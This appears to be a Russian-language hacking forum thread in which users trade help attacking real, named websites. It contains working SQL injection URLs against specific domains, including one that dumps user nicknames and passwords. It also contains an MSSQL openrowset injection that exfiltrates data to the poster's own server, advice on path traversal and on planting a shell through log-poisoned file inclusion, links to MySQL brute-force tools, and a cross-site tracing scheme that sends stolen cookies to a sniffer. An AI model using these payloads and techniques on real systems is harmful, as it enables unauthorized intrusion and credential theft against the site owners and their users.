он хостится на сурсфордже.

jedit.sourceforge.net
jedit.org

ой....Надеюсь, ты меня простил))). И ещё я надеюсь,шо вы не против моих вопросов(пусь и тупых ну что поделаешь...дубина я такая( ). Вот есь сайт

www.iodbc.org

Глобальный инклуд не сделать, а знач и шелл не залить(.если передать кавычку,выдаст путь,и ошибку:

http://www.iodbc.org/index.php?page=index

Выдало вот:

Oi!

Please test index.php instead of index.html!

Появились ещё вопросы:

1. Как узнать, какой путь использывать, и к каким файлам( где достать).
2.Как правильно обходить каталог ? подставляя всякие там ../ или ../../../

Я понял,что ../ это переход на уровень выше, но как определить, сколько их там,и какие файлы запрашивать ? Ведь например ../../etc/pwd и ../../../../../etc/pwd не тоже самое ?))). Запутался я.............



Warning: readfile(index.php.html) [function.readfile]: failed to open stream: No such file or directory in /dbs/iodbc/public_html/www.iodbc.org/index.php on line 138

Даёт это что-то ?))

Подставил без расширения существующий фаил index.php:

А какой конкретно брут? Их навалом ).Например, тот же Brutus AET 2 (кажись так:РР).Там можно настроить по многим протоколам,кроме ссл,но для этого другие бруты есть. Гайдов по нему тоже полно( на русском кстати) .Там должны быть настройки полным перебором, по словарю(он те наф не нужен).И указан диапазон фицр в виде 0123456789.Что-то вроде того:Р
Дело в том что перебирает 1 пароль и пишет ...due to unknown duration. От чего это может быть? В гайдах ничего не нашел.

В связи с неизвестной продолжительностью - неправильно задал наверное перебор - мошь долго слишком. Напиши на 292-514-125 - разберэмся )

Warning: readfile(index.php.html) [function.readfile]: failed to open stream: No such file or directory in /dbs/iodbc/public_html/www.iodbc.org/index.php on line 138

ты в /dbs/iodbc/public_html/www.iodbc.org/

четыре уровня, т.е. ../../../../ и ты в корне. правда тут мэджики.

иногда попадаются sql inc, где есть доступ к mysql.user,узер выводится рут,а пароль нет почему? пароли другиъ пользователей из mysql.user выводятся

Потому что руту забыли поставить пароль)

Можно узнать, что это за ошибочка?

http://hosting.mail.ru/select_domains_reg_period.jsp?domain='

porter, фильтр выдал пустое значение переменной, вот и ругается. Скулю туда прописать не удалось.

Здравствуйте, подскажите какими способами можно достать smtp сервер, не покупая хостинг. Искал в гугле бесплатные - ни одного рабочего...

ну собственно не как :)купи проше деда да втыкай что душе угодно :)

вот интересно, нашел сайт, есть таблица админы, ну и там одмины естт и пароли, но на сайте нет ни форума ни админки (сканил) на фтп не подходят, вопрос Зачем они нафиг нужны?

вот интересно, нашел сайт, есть таблица админы, ну и там одмины естт и пароли, но на сайте нет ни форума ни админки (сканил) на фтп не подходят, вопрос Зачем они нафиг нужны?
может осталась от чего-то. или просто бд тестили. или фейк. или для другого домена. есть много вариантов

Пробую сделать передачу данных через инжект на свой mssql-сервер. Но возникла проблема с моим принимающим сервером.

Купил windows-хостинг с выделенным ипом. Создал базу данных MSSQL 2005 с именем basename. Пользователь username с паролем password. Создал таблицу tbltest с колонкой pubs.

Посылаю запрос: http://www.top25cigar.com/reviewdatabase/product.asp?pkID=8797&showprod=yes&catpkID=315;insert+into+openrowset('sqloledb','uid =username;pwd=password;network=DBMSSOCN;Address=20 8.115.103.4','select+line+from+pubs..tbltest')+sel ect+name+from+master..sysdatabases;--

В ответ получаю Cannot open user default database. Login failed. Хотя по умолчанию база данных установлена. Мне кажется, что ошибка где-то в правах доступа.

Что мне исправить? Ниже приложу несколько скриншотов из MSSQL Server Management Studio Express.

http://img88.imageshack.us/img88/3797/01cp9.gif
http://img88.imageshack.us/img88/1010/02xg9.gif

cyberia
1 акк корректен
2 твоя таблица создана и идентична по структуре
3 запрос без грамматических ошибок
4 есть права на чтение master..sysdatabases
Эти условия выполнены?
Помоеиу невыполнение ЛЮБОГО из условий не даст тебе ничего сделать.
Да , забыл, порт на котором твой сервер висит.
Имхо слишком много заморочек, но дело твоё конечно, проверь ВСЕ условия

Подскажите, что можно зделать есть маленький доступ

http://fialki.ho.com.ua/products_pictures/
вот от создателей
http://www.shop-script.ru/images/
или это не чего не дает

2Hell0
Это дает только просмотр файлов и каталогов в данных директориях

Здравствуйте, разесните мне пожалуйста один момент, при сканировании портов утилитой Shadow Security Scanner 7, она показывает что на сервере открыто огромное количество портов, среди них очень много бекдоров, нахожу клиен к бекдору, но не один не коннектится, пробовал на разных сайтах, где открыты эти порты, ни чего не получилось.
XSpyder'ом пробывал сканить, тот вообще не работает, ни трафу не жрет, ни порты не сканирует, только нагрузку на проц создает. Помогите пожалуйста дельным советом.

Spaise
В чём вопрос то?
XSpyder не работает? Или открытые порты смущают?Огромное кол-во это сколько, и главное какие?С чего ты взял ,что "среди них очень много бекдоров", что за клиент к бекдору? :D

товарисчи напомните как вывести имя бд, для опр. таблицы, schema_name помню, а откуд забыл

SELECT table_schema FROM information_schema.tables WHERE table_name='imyatablici'

http://www.wfsj.org/projects/page.php?id=-62+union+select+null,null,null,null,null,null,null ,null,null,null,null/*

такя проблема есть скуль возникла такая проблема с выводом заначений когда вставляю подставляю int значения

http://www.wfsj.org/projects/page.php?id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11/*

все норм но если подставляю Что нить типа user или from table возникает ошибка в чем проблема :)

Пробуй так

http://www.wfsj.org/projects/page.php?id=-62+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(USER() ,0x71),0x71),4,5,6,7,8,9,10,11/*

вер. 4.1.7-nt-max
юзер. wfsj@localhost
Прочитать можно тут
http://forum.antichat.ru/showthread.php?t=19605

Да и еще, убери пробелы которые добавил форум.
Удачи.

спс

вобщем тема такая- защел я на наше посольство зарубежом(по понятным причинам умолчу в которое) и в поиске ввел "><script>alert()</script>
на что мне выдало

http://i044.radikal.ru/0804/b2/6b79683d5755.jpg
вот и возникает у меня вопросс- действительно это скуль? и насколько это опасно в плане IT безопасности (за Родину обидно млин) , мож предупредить их ?

я таки думаю что кроме раскрытия путей больше не как и не используешь по крайней мере по скрину :)
ну это раскрытие может быть полезно если будет скуль с filepriv :)

типичная ошибка servlet'a имхо...

zapadlo17
Помоему ошибка при проверке ввода, просто некоректные данные
Всмысле, возможность инжекта из этого не вытекает

Ошибка говорит о том, что на MSSQL сервере (скорее всего) отключена поодержка full text search, не знаю почему возникает такая ошибка, но скорее всего из-за того, что в запросе встречаются спецсимволы, которые в полнотекстовом поиске используются в качестве шаблонов

Я не наю, куда ещё писать, но раз это вопросы,то вот пара нупских вопросов :
1. Надо ли указывать настоящий логин для перебора хеша?))
2. Если да, то как в таком случае используется логин(или имя,как хотите : ) ) для перебора ?)

Велемир
1 нет.
2 может быть полезен при переборе по маске. т.е. если логин (частично) входит в пароль

День добрый!
Обьясните мне пожалуйста что я делаю не так...
Нашел inj через POST

пробую сатереть таблицу которая там сто пудово есть
Вот что пишет

You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'union+drop+table+SS_zones+#' order by zone_name' at line 1 SQL query : select zoneID, zone_name, zone_code, countryID from SS_zones where countryID='2'+union+drop+table+SS_zones+#' order by zone_name

использовал и # и /* что не получается закоментировать

И если не трудно дайте ссылки почитать где и как методом пост инжектить и инфу выводить а то что то вода одна ничего не работает

Вообще-то через union только выборку данных можно делать, т.е. union select...
Чтобы удалить таблицу, можно попробовать выполнить запросы через точку с запятой, но скорее всего это не сработает.

Эм...А разве можно узнать, входит ли часть логина в пароль,если он зашифрован?).За ответ на первый вопрос благодарю, терь мона и похимичить)

Эм...А разве можно узнать, входит ли часть логина в пароль,если он зашифрован?).
смотря чем. если необратымыми алго, то только после расшифровки.

ЗЫ сам подумай, разве можно узнать, есть ли нужный пасс в словаре, если пасс зашифрован?

Извини, я почему-то слово словарь вообще пропустил))))))))))))). А какие алгоритмы обратимые есть ?).Такие алгоритмы наверн расшифровываются сразу )

Извини, я почему-то слово словарь вообще пропустил))))))))))))). А какие алгоритмы обратимые есть ?).Такие алгоритмы наверн расшифровываются сразу )
http://quest.antichat.net/code.php

base64=)

Народ, Помогите. Ну могу я прочитать ../../../etc/passwd..
И что дальше.. недоганяю

Dimi4
Да ничего, по большому счёту ,можешь попробовать залогиниться на сервер с акком вида логин-логин,можешь поискать файлы с паролями.Если это инклуд, а не читалка файлов,можешь залить шелл

http://hi-tech.mail.ru/?id=1027-1
Тоже что и
http://hi-tech.mail.ru/?id=1026

Никак не получается отсечь всё что после id, т.е. ни -- ни /* не срабатывают, причём
http://hi-tech.mail.ru/?id=1026-- работает нормально, а с http://hi-tech.mail.ru/?id=1026/* перебрасывает на главную страницу.

Но в то же время http://hi-tech.mail.ru/?id=1026--LALALA - падает. Есть какие варианты использования?

вот и интерсует, как через локальный инклуд залить шелл

Dimi4, залей шелл с разрешёным расширением и вызови его через инклуд. Вообще можешь поискать файл etc/passwd и etc/shadow. Еще можешь поискать настройки админа и настройки апач и с ними поиграться.
Единственное, что может стоять предпроверка аплодныйх файлов, которая может заблокировать твой инклуд.

Dimi4
На чтение etc/shadow прав не хватит 99% если интересен имено шелл , то можно попробовать внедрить код в логи апача(access.log и error.log) а потом проинклудить их

Помогите найти админку www.sotovikm.ru
Чем вообще их найти можно, шоб без гимора?

Админку не нашёл, но скулей туева хуча :)

Да скулей хуча))) поэтому и ищу админку)

truelamer
Сканером и гуглом

а сканер какой? посоветуйте.

truelamer
Посмотри на это, всё-таки местная разработка:
_https://forum.antichat.ru/threadnav40031-1-10.html

http://www.ulsu.ru/news/?i=-0'+union+select+1,2,3,4,5,6,7/*
Что делать... .

http://www.ulsu.ru/news/?i=-0'+union+select+1,2,3,4,5,6,7/*
Что делать... .
Там нет скули
http://www.ulsu.ru/news/?i=2-1
не равно
http://www.ulsu.ru/news/?i=1

maxster, скуля есть, у них просто кривая фильтрация.

На этом сайте режется символ запятой в id, точнее всё, что после него, и в итоге запрос принимает вид

-0' union select 1' AND `news_date`<='2' ORDER BY `news_date` DESC,`id`

Скорее всего, юнионом здесь воспользоваться не получится.

maxster, скуля есть, у них просто кривая фильтрация.

На этом сайте режется символ запятой в id, точнее всё, что после него, и в итоге запрос принимает вид

-0' union select 1' AND `news_date`<='2' ORDER BY `news_date` DESC,`id`

Скорее всего, юнионом здесь воспользоваться не получится.
Я заметил ... .+ подставляет всякую бяку перед нехорошими символами((

PHP Warning: odbc_exec() [function.odbc-exec]: SQL error: [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'sp.SPECIMEN_ID = 2541 or 1=@@version) -- AND sp.SITENO = si.SITENO'., SQL state 37000 in SQLExecDirect in G:\InetPub\wwwroot\public_site\search.php on line 305 PHP Warning: odbc_fetch_array(): supplied argument is not a valid ODBC result resource in G:\InetPub\wwwroot\public_site\search.php on line 307

такую ошибку получаю, почему -- не режет запрос? как обойти

зы с mssql первый раз столкнулся

Помогите с количеством столбцов http://mqup.mcgill.ca/book.php?bookid=-1'
order by говорит что их 3, но что-то не так

при 25 выдает полностью запрос

Error executing the SQL Query : SELECT authors.*, bookauthors.authorType, bookauthors.bookID FROM bookauthors INNER JOIN authors ON bookauthors.authorID = authors.ID WHERE bookauthors.bookID = -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25/* and authorType = 1

lsass.exe
а что толку от этого?

тут аналогичная канитель(
http://www.americanmap.com/catalog/browse.php?root_id=24&cat_id=-1+union+select+77777777777777777/*

вроде столбцов один, но ничего не получается

хз пробуй подзапросы

пример http://mqup.mcgill.ca/book.php?bookid=1%20AND%20ascii(lower(substring((S ELECT%20password%20from%20mysql.user%20WHERE%20use r=%22root%22%20LIMIT%201),1,1)))%3E48


Error executing the SQL Query : SELECT * FROM books WHERE ID = 1 AND ascii(lower(substring((SELECT password from mysql.user WHERE user="root" LIMIT 1),1,1)))>48
Error : 1142 SELECT command denied to user 'mqup'@'localhost' for table 'user'

xcedz
Спасибо за совет с подзапросами

таким способом узнал
что версия скулы 5
http://mqup.mcgill.ca/book.php?bookid=1+AND+lower(substring(version(),1, 1))='5'

что есть таблица authors
http://mqup.mcgill.ca/book.php?bookid=1+AND+lower(substring((select+tabl e_name+from+information_schema.tables+limit+17,1), 1,1))='a'
....

итд

Все понял буду знать!

Hi,
what do you do, if you get a SQL Injection, and the version() is < 5.0 ?
If < 5.0 there isn't any Information_Schema. Do you just guess the right table/column names?
Load_File is a possibility too, but it doesn't work each time.

Thank you

Lidloses_Auge
If I'm not mistaken there is no other way to get some information. You can use lists of table names it'll be like a b-forse)))
look here for table base
http://forum.antichat.ru/nextnewesttothread49622.html

Do you just guess the right table/column names?
There's no another way to check if a table with current name exists.
For instance u can write a script which will check them one by one from a dictionary as the chance of some tables' with default names existance is rather high.

I'm just searching for more possibilities of using an injection like:

load_file
benchmark
ascii(lowerstring(substring ....
information_schema
into dumpfile

you know more interesting ways?

Подскажите мне пожалуйста вот когда я использую load_file() я могу сделать так - load_file('/index.php')? и если я так сделаю то я увижу исходник страницы?

И как вообще узнать что эта функция работает? только если то что я в ней указал вылезит на экран так?

Yes you can, but you've to look in the Sites Source, for the source you want to display.
E.g.:

load_file('/index.php')
then you've to watch the source and look after the index.php.
In some cases the index.php isn't printed correctly so you've to watch in the source.
You can also hex-encode the load_file and decrypt it later.

Подскажите мне пожалуйста вот когда я использую load_file() я могу сделать так - load_file('/index.php')? и если я так сделаю то я увижу исходник страницы?

И как вообще узнать что эта функция работает? только если то что я в ней указал вылезит на экран так?

увидишь, только если в корне есть файл index.php (он там нафиг не нужен)
В качестве аргумента в эту функцию надо передавать реальный путь, а не относительный (можно конечно и относительный, но толку в этом немного, так как тогда нужно будет указывать путь относительно каталога файлов mysql сервера)

узнать есть ли файловые привилегии у пользователя можно например так:
union select file_priv from mysql.user where user=left(user(),locate(0x40,user())-1)/*
но это только если есть доступ к mysql.user

если нет то только с помошью анализа результата функции, все неудобство в том, что если файла не существует или есть ограничения на чтение файла (например права доступа) то функция возвращает null а не выплевывает ошибки

Кароче.Возможно повторп,но прошу не пинать.
Есть 2 вопроса:
1)Как можно ломануть phpmyadmin;
2)Есть трекер.Движко TBDev.Там,на трекере есть папка с файлом дампа Базы Данных.ЕЕ надо удалять после устаовки.Но ее не удалили. помоему там есть права на запись,хотя могу ошбатсо.НУ чем ето может помочь?И вообще кто-нибудь знает как ломать ети двиги?

-----пример-----
http://deniska.ath.cx/ - только помоему рабаотает после 14.00 :D

ikolla$$,
1)http://milw0rm.com/search.php в строке поиске пишешь phpmyadmin. То же самое можно проделать на securitylab.ru, securityfocus.com и т.д.

2)Ну попробуй скачать этот дамп и посмотреть что в нем есть интересного. Хотя, имхо, ничего в нем нет интересного, ибо там скорее всего просто дефолтное строение бд без значений, которые потом уже вбивались.

Народ, а как выполнить запрос, если полей там около тысячи ?)))).В URL ведь количество вводимых символов ограничено, потому запрос через юрл никак((

Пробывал вот POST запрос:

GET /page.html?id=5 HTTP/1.1
Accept: */*
Accept-Language: uk
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SQL_TOOL)
Host: host.ru
Connection: Close
Content-Type: text/html
Content-Length: 2850

%20union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 ,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,6 5,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81, 82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98 ,99,100,101,102,103,104,105,106,107,108,109,110,11 1,112,113,114,115,116,117,118,119,120,121,122,123, 124,125,126,127,128,129,130,131,132,133,134,135,13 6,137,138,139,140,141,142,143,144,145,146,147,148, 149,150,151,152,153,154,155,156,157,158,159,160,16 1,162,163,164,165,166,167,168,169,170,171,172,173, 174,175,176,177,178,179,180,181,182,183,184,185,18 6,187,188,189,190,191,192,193,194,195,196,197,198, 199,200,201,202,203,204,205,206,207,208,209,210,21 1,212,213,214,215,216,217,218,219,220,221,222,223, 224,225,226,227,228,229,230,231,232,233,234,235,23 6,237,238,239,240,241,242,243,244,245,246,247,248, 249,250,251,252,253,254,255,256,257,258,259,260,26 1,262,263,264,265,266,267,268,269,270,271,272,273, 274,275,276,277,278,279,280,281,282,283,284,285,28 6,287,288,289,290,291,292,293,294,295,296,297,298, 299,300,301,302,303,304,305,306,307,308,309,310,31 1,312,313,314,315,316,317,318,319,320,321,322,323, 324,325,326,327,328,329,330,331,332,333,334,335,33 6,337,338,339,340,341,342,343,344,345,346,347,348, 349,350,351,352,353,354,355,356,357,358,359,360,36 1,362,363,364,365,366,367,368,369,370,371,372,373, 374,375,376,377,378,379,380,381,382,383,384,385,38 6,387,388,389,390,391,392,393,394,395,396,397,398, 399,400,401,402,403,404,405,406,407,408,409,410,41 1,412,413,414,415,416,417,418,419,420,421,422,423, 424,425,426,427,428,429,430,431,432,433,434,435,43 6,437,438,439,440,441,442,443,444,445,446,447,448, 449,450,451,452,453,454,55,456,457,458,459,460,461 ,462,463,464,465,466,467,468,469,470,471,472,472,4 74,475,476,477,478,479,480,481,482,483,484,485,486 ,487,488,489,490,491,492,493,494,495,496,497,498,4 99,500,501,502,503,504,505,506,507,508,509,510,511 ,512,513,514,515,516,517,518,519,520,521,522,523,5 24,525,526,527,528,529,530,531,532,533,534,535,536 ,537,538,539,540,541,542,543,544,545,546,547,548,5 49,550,551,552,553,554,555,556,557,558,559,560,561 ,562,563,564,565,566,567,568,569,570,571,572,573,5 74,575,576,577,578,579,580,581,582,583,584,585,586 ,587,588,589,590,591,592,593,594,595,596,597,598,5 99,600,601,602,603,604,605,606,607,608,609,610,611 ,612,613,614,615/*

Что я сделал не так? Объясните пожалуйста)).Сайт сказать не могу, ибо сам хочу попробывать ))

помогите разобраться с такой ересью )
http://www.9000rpm.ru/service.html?id=1+group+by+4/*
нету выводимых полей

http://www.9000rpm.ru/service.html?id=111+union%20select%20concat_ws(0x3 a,nick,pass),2,3,4+from+user+--+
читай маны

Велемир
99% что ты что-то напутал как ты узнал,что полей больше тысячи?

http://www.9000rpm.ru/service.html?id=1+union+select+concat_ws(0x3a,nick ,name,pass),2,3,4+from+user+limit+1,1/*

Наслажлаемся гг)

пля..уже напостили)

Их там поменьше - а узнал с помощью order by ака group by

Бля а доступ к бд мона получить, если нет доступа к mysql.user и инклудов ? )))))

Вобщем есть сервер с мускулем. Знаю Mysql юзера и пароль. Но не могу найти phpmyadmin или что-либо аналогичное. Точнее нашел, но когда набираю www.site.com/phpmyadmin/, то говорит что доступа нет. Вытекает вопрос: Как подключится к базе, точнее чем?

lolman, а "phpmyadmin/main.php" пробовал?

Походу низя ))))

Велемир если там реально так, то попробуй через посимволный если позволяет версия мускула

да пробовал, не катит( вот пробовал залить шелл на бесплатный хост, а с него подключиться к базе, но не получилось. Это вообще возможно?

Мля ну я точно не ошибся... там реально поелй меньше тысячи, точное число мона узнать. Вот как столько выбрать я хз(юнионом).Груп бай тоже самое число выдаёт,то бишь если выбираешь макс. допустимое x число столбцов - норм,а x+1даёт ошибку )

Велемир
Давай ссылку, там хоть инъекция-то есть может там ошибка уже из-за максимально допустимого значения параметра? :d
Ты вообще как себе такую таблицу представляешь?

В общем жопа, запрос такой :

select distinct u.id, u.login, u.name, u.status, p.birthdate, p.city, p.sex from user u, profile p, mypeople mp where mp.active = 1 and mp.user = and mp.pal = u.id and u.id = p.id order by u.name, u.login limit 1

ордер баю ваще по*** походу , выбираю ид 104 - пральный, а 102 и 103 показывает,что не правильный (( Аблом наф.

http://www.seeeto.com/user.html?id=

Вот))

Возможен ли брут MySQL базы??
Я навикатом проверил IP и базу :D , показало 1045 - Access denied for user "login'@'myip' (using password: YES)
Есть ли прога которой можно ввести юзер нейм и брутить пасс? либо утилита но что бы непупер навороченая настройками... :)

Rogun, по-моему Hуdra умеет перебирать пароли к БД.

Rogun, _ttp://www.kd-team.com/tools/BruteMySql_KD-Team.rar и _ttp://www.d4rk-m00n.info/forum/modules.php?name=Forums&file=viewtopic&t=75

на втором нужна рега :)

з.ы. для тех, кто экономит трафф - по первой ссылке java-брутфорс от KD-Team, а по второй php-брутфорс от lun0s.

В общем жопа, запрос такой :

select distinct u.id, u.login, u.name, u.status, p.birthdate, p.city, p.sex from user u, profile p, mypeople mp where mp.active = 1 and mp.user = and mp.pal = u.id and u.id = p.id order by u.name, u.login limit 1

ордер баю ваще по*** походу , выбираю ид 104 - пральный, а 102 и 103 показывает,что не правильный (( Аблом наф.

http://www.seeeto.com/user.html?id=

Вот))

имхо нет инъекцииб там получается, что весь _REQUEST фильтруется таким образом, что остаются только цифры, например id=2 покажет пользователя с id=2, id =1 and 1=1 покажет пользователя с id=111, id 1 and 1=2 покажет пользователя с id=112, также походу запрос не принимается полностью если в нем есть определенные символы или слова

Мдя....вот шняга то. А по идеее же если id = 2, id=1 and 1=1 должно же выводить id = 2 просто((. Бля, не секу я в этих запросах Ж... Вроде с виду всё понятно, а как посморишь, так плохо :Р

Rogun, _ttp://www.kd-team.com/tools/BruteMySql_KD-Team.rar и _ttp://www.d4rk-m00n.info/forum/modules.php?name=Forums&file=viewtopic&t=75

на втором нужна рега :)

з.ы. для тех, кто экономит трафф - по первой ссылке java-брутфорс от KD-Team, а по второй php-брутфорс от lun0s.
а как запустить Java-скрипт?(там просто текстовый файлик в формате Java) его настроить надо?оО :confused:

ФАК 2сцылка на муск брутер непашет(( а точнее я зарегился уже впредверьи скачать брутер и тут "URL Err" типа нету фаила, а по постам от админа он ещё упирается :D пришлось им оставить комент от россии :)

Rogun, сорри за вторую ссылку, не знал.

Вот небольшой справочник по java _ttp://sources.ru/java/faq/ (сам в этом не особо разбираюсь)

Вот ещё вариант брутфорса на ruby

_ttp://mashimaro7496.blogspot.com/2007/12/ruby-sql-brute.html

кто знает в каким алгоритмом зашифровано: <nick:hC6U8ALGWw==><textcol:aQ==>

base64 похоже

я тоже так думал но при расшифровке выводит: „.”рЖ[ как я понял каждая буква зашифрована 2 символами... так как textcol состоит и 2-х цифр а ник у меня тот же KIR@PRO и он зашифрован так: hC6U8ALGWw==

попали исходник

дак нету его у меня... я в чате посмотрел сви cookie и там такая строка <nick:hC6U8ALGWw==><textcol:aQ==><un:chlz5+I=><skin:mke1JCTVb80=><se:pkarHg==>

прошу прощенья это зашифровано чатом бородина... может ктонить обяснит.... как его расшифровывать?


вот куски кода: function md5pass($pass) { $s=substr(md5($pass."84dje#@sp)("),18,6). substr(md5($pass."ляляля..."),3,6). substr(md5($pass."...хехехе"),23,6). substr(md5($pass."ну-ка расшифруй"),10,14). md5($pass."йцукен").md5($pass."qwerty").md5($pass."2002"); $c=strlen($s)/2; $ss=""; for ($i=0; $i<$c; $i++) { $ss.=chr(hexdec(substr($s,$i*2,2))); } return $ss; } function decrypt($s,$pass) { $md=md5pass(strval($pass)); $s=strval($s); for ($i=0; $i<strlen($s); $i++) $s[$i]=chr((ord($s[$i])-ord($md[$i%strlen($md)])*5)%256); for ($i=0; $i<strlen($s); $i++) $s[$i]=chr((ord($s[$i])-ord($pass[$i%strlen($pass)])*6)%256); return $s; } function encrypt($s,$pass) { $md=md5pass(strval($pass)); $s=strval($s); for ($i=0; $i<strlen($s); $i++) $s[$i]=chr((ord($s[$i])+ord($pass[$i%strlen($pass)])*6)%256); for ($i=0; $i<strlen($s); $i++) $s[$i]=chr((ord($s[$i])+ord($md[$i%strlen($md)])*5)%256); return $s; }


Шифруется так вроде: base64_encode(encrypt($v,$pass))


помогите пжлста а то уже голова кругом идет......
что именно идет в переменных $v и $pass ???

возникла такая проблема скрипт дописывает к имени htm
%00 не помог :( и вообше являеться ли это уявимостью ? добавление страницы происходит через readfile ! могу ли я читать через нее фаилы на сервере ? !
ссылка в комплекте :)

http://de.selfhtml.org/html/asdfsdfs

У мя такое тож бывало. Эксперты грят, мол если нулевой байт не помогает, то никаг =____=.Хотя, один чел грит что обходил как-то)(

Насчёт сканера Web Vulnerability Scanner -если кто пользовался.и аналогичными))). Йа не фкурил, какого хрена он показывает PHPSESSIONID и Cookie ?)).Походу, мои же собственные)(. Читал про ид сессии в пхп, что оно ниче не даёт. Сессии - PHPSESSID and ASP.NET SESSIONID. Они же ниче не дают о_О...понту их показывать..Ж(

Потом показывает часто такую хрень ---

A broken link refers to any link that should take you to a document, image or webpage, that actually results in an error. This page was linked from the website but it is inaccessible.
This vulnerability affects /CDReviews/Opus2ProgressiveWorld.aspx

Из перевода следует, что это *ломанная* ссыла, которая перенаправляет на другую ссылу,на которой находится какой-то документ,и мол он приведёт меня к документу, изображению или веб странице, которая и сообщает эту ашиппку. Эта ссылка была со страницы(какой-т), но страница не доступна. И на тесс- мол линк))).Обычная системная ашиппка,хули он орёт как падла )))

Или вот ещё:

When a new name and password is entered in a form and the form is submitted, the browser asks if the password should be saved. Thereafter when the form is displayed, the name and password are filled in automatically or are completed as the name is entered. An attacker with local access could obtain the cleartext password from the browser cache.
This vulnerability affects /Login.aspx.
The impact of this vulnerability
Possible sensitive information disclosure

Детали атаки :
Password type input named ctl00$ctl00$ctl00$ctl00$Content$Content$Content$Co ntent$aspLogin$txtPassword from form named aspnetForm with action /Login.aspx has autocomplete enabled

Мошь кто англ не знает(хоть чуточку),поясню:

Когда введён новый логин и пароль в форму, которая активируется, браузер спрашивает у юзера, мол надо сохранять эти данные али нет. Затем, когда форма отображена, данные автоматом заносятся в форму и уже не нужно будет их вводить заново. Атакующий может получить *очищенный* пароль( всмысле, тот,что был введён автоматом)) ) из кеша браузера. Эта бага затрагивает скрипт /login.aspx.

Ну и мол заключение - раскрытие чувствительной информции, введённой пользователем ))).

Вопрос: Лажа это или нет ? Просто хочу знать. стоил ли мне тратить время и силы на муть, похожую на эту,ибо какие атаки использывать не написано(локальный доступ понятие растяжимое))) ).Скорее всего,это XSS, XCRF или тому подобное).Ваше мнение ?)

2Велемир
1. про ссылку допустим сайт умер на который идет линк домен закрыли!:)а ссылка все ещё висит :) покупаешь этот домент ;)создаешь там директорию под этот линк и вот ты имеешь линк с этого сайта вешаешь фрейм льешь траф :)если страница довольно раскручина !
2.по браузер то есть про второй пункт твоего поста вообшем ежели юзеру залить троя котрой грабит авто заполнее тогда да это можно посчитать за уязвимоть но уязвимость пользователя а не сайта :) вот так то если подумать тогда уязвимы огромное количтво сайтов так как допустим ие вообше какжий пароль предлагает созранить так что не заморачивай лажа енто все ;) к XSS это отношения вообше не какого не имеет !

Пасиб те, вывел из транса ))))).
Вот нашёл нщё одну темку. Из своего скудного опыта по HTTP запросам знаю, что есь там такие запрсоы как гет.пост.пут,делит,лок,анло� � и т.д.))

В общем, там так :

Если послать такой заголовок :

OPTIONS / HTTP/1.0
Accept: */*
Host: www.site.com
Cookie: astratop=1
Connection: Close
Pragma: no-cache

То выведет список методов, которые используются.ответ составил такое:

Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK

PROPPATCH,LOCK,UNLOCK,MKCOL,PROPFIND я не знаю,остальны походу знаю(надеюсь))))). Вот в чём разница Public и Allow непонятно. Allow - то бишь разрешены, стопудоф работают(копи сёрч профинд и вда последних ещё не првоерял,что дают пока тож не знаю). Что-нибудь это даёт не знает кто ?)

Возвращает код ошибки цука 403 (Запрещено).

Так, ещё вопрос: Узнал вот про использование метода TRACE. Описание на старом Античате такого :

Используя ActiveX компонент XMLHTTP, мы отсылаем запрос TRACE на целевой web сервер. Если есть поддержка TRACE, броузер покажет данные отосланные вместе с HTTP запросом. Internet Explorer отсылает по умолчанию данные, а JavaScript выводит окно с содержанием HTTP запроса. Если ваш браузер имеет cookie от удаленного сервера, или находится на сервере используя WEB авторизацию, то следовательно данные могут быть перехвачены злоумышленником. Эта технология гарантирует обход атрибута "HttpOnly", потому что не используется функция document.cookie. Но самое страшное то, что от CROSS-SITE TRACING не спасает даже SSL. На данном этапе важно осознать две вещи.

1 Данная технология поддерживается Internet Explorer.
2 Mozilla/Netscape воспринимают такие cookie, как обычные.

При использовании TRACE запрос должен исходить со скрипта принадлежащего одному домену с целевым сервером. Так, скрипт который посылает запрос TRACE и соединяется с mail.ru должен принадлежать серверу mail.ru. Технология доменных ограничений помогает защитить пользователей от XSS. Для обхода данного ограничения существуют два варианта: XSS в контексте броузера или сервера. Если возможность XSS присутствует на сервере, то предыдущий сценарий и будет эксплоитом. А для использования изъянов в броузере нужно воспользоваться таким сценарием:

1 Создание эксплоита для получения доступа в другую доменную зону (в принципе этого хватает если не используется флаг "НttpOnly").
2 Задание в качестве исполняемого кода сценария запроса TRACE

Насчёт контекста браузера непонятно,хотя перечитываю раз пять уже (. Тобишь скрипт должен находиться на компе юзера,и его надо запустить ? ).И ещё : это сработает тоьлко в том случае, если серв поддерживает старую добрую трейсю ?:Р.Первый вариант меня жутко раздражает, ибо если у мя есь доступ к серву, то я полюбому вытащу оттуда и логин и пароль))))(куки уже не нужны будут, ибо для каждого домена они свои, и нахрен не сработает так со всеми сайтами ))) ). Такие вот пироги е*аные ))))))).Мошь прояснит кто : )

Вобщем смотри, если браузеру, точнее именно ослу приходят от сайта куки помеченные НttpOnly то с помощью обычной XSS ты эти куки не вынешь, зато можно сделать скрипт на JS который отправит TRACE запрос серверу который вернется браузеру вместе с куками которые ты не мог увидеть т.к. они помечены НttpOnly и отослать эти куки на сниффер (вернее не куки, а все заголовки и куки в том числе)
